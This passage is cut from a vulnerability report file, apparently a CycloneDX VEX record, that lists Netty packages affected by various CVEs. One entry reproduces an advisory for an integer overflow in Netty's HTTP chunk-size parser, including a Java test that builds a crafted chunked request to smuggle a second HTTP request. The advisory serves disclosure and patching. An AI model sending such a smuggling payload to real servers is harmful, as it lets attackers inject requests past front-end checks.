          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#032d3eca-865d-4e54-817b-51d5b30b4a0f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#032d3eca-865d-4e54-817b-51d5b30b4a0f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#032d3eca-865d-4e54-817b-51d5b30b4a0f"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#032d3eca-865d-4e54-817b-51d5b30b4a0f"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#161f3ee7-872b-4b63-ba5d-0602d3943402"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#161f3ee7-872b-4b63-ba5d-0602d3943402"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#161f3ee7-872b-4b63-ba5d-0602d3943402"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#161f3ee7-872b-4b63-ba5d-0602d3943402"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#5046a3af-c325-4aa8-ba8e-dd9af0dbaa48"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#5046a3af-c325-4aa8-ba8e-dd9af0dbaa48"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#5046a3af-c325-4aa8-ba8e-dd9af0dbaa48"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#5046a3af-c325-4aa8-ba8e-dd9af0dbaa48"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#84c909fd-5bc1-4867-8cef-2005fd8a05f1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#84c909fd-5bc1-4867-8cef-2005fd8a05f1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#84c909fd-5bc1-4867-8cef-2005fd8a05f1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#84c909fd-5bc1-4867-8cef-2005fd8a05f1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#728fa2c5-40a5-4b71-8ce4-f1eed28f3f88"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#728fa2c5-40a5-4b71-8ce4-f1eed28f3f88"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#728fa2c5-40a5-4b71-8ce4-f1eed28f3f88"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#728fa2c5-40a5-4b71-8ce4-f1eed28f3f88"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#154575da-391d-481e-935b-f73fe17723a3"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#154575da-391d-481e-935b-f73fe17723a3"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#154575da-391d-481e-935b-f73fe17723a3"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#154575da-391d-481e-935b-f73fe17723a3"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#47ef4ea2-e719-4040-baa9-4ba7cc55c8e5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#47ef4ea2-e719-4040-baa9-4ba7cc55c8e5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#47ef4ea2-e719-4040-baa9-4ba7cc55c8e5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#47ef4ea2-e719-4040-baa9-4ba7cc55c8e5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-42580",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        }
      ],
      "description": "### Summary\nNetty's chunk size parser silently overflows int, enabling request smuggling attacks.\n\n### Details\nio.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.\n\nThe size is accumulated as follows:\n\nresult *= 16;\nresult += digit;\n\nThe result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size.\n\n### PoC\nThe test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.\n\n```java\n@Test\npublic void test() {\n    String requestStr = \"POST / HTTP/1.1\\r\\n\" +\n            \"Host: localhost\\r\\n\" +\n            \"Transfer-Encoding: chunked\\r\\n\\r\\n\" +\n            \"100000004\\r\\n\" +\n            \"test\\r\\n\" +\n            \"0\\r\\n\" +\n            \"\\r\\n\" +\n            \"GET /smuggled HTTP/1.1\\r\\n\" +\n            \"Host: localhost\\r\\n\" +\n            \"Content-Length: 0\\r\\n\" +\n            \"\\r\\n\";\n\n    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());\n    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));\n\n    // Request 1\n    HttpRequest request = channel.readInbound();\n    assertTrue(request.decoderResult().isSuccess());\n    HttpContent content = channel.readInbound();\n    assertTrue(content.decoderResult().isSuccess());\n    assertEquals(\"test\", content.content().toString(CharsetUtil.US_ASCII));\n    content.release();\n    LastHttpContent last = channel.readInbound();\n    assertTrue(last.decoderResult().isSuccess());\n    last.release();\n\n    // Request 2\n    request = channel.readInbound();\n    assertTrue(request.decoderResult().isSuccess());\n    last = channel.readInbound();\n    assertTrue(last.decoderResult().isSuccess());\n    last.release();\n}\n```\n\n### Impact\nHTTP Request Smuggling: Attacker injects arbitrary HTTP requests",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.13.Final, 4.1.133.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42580"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
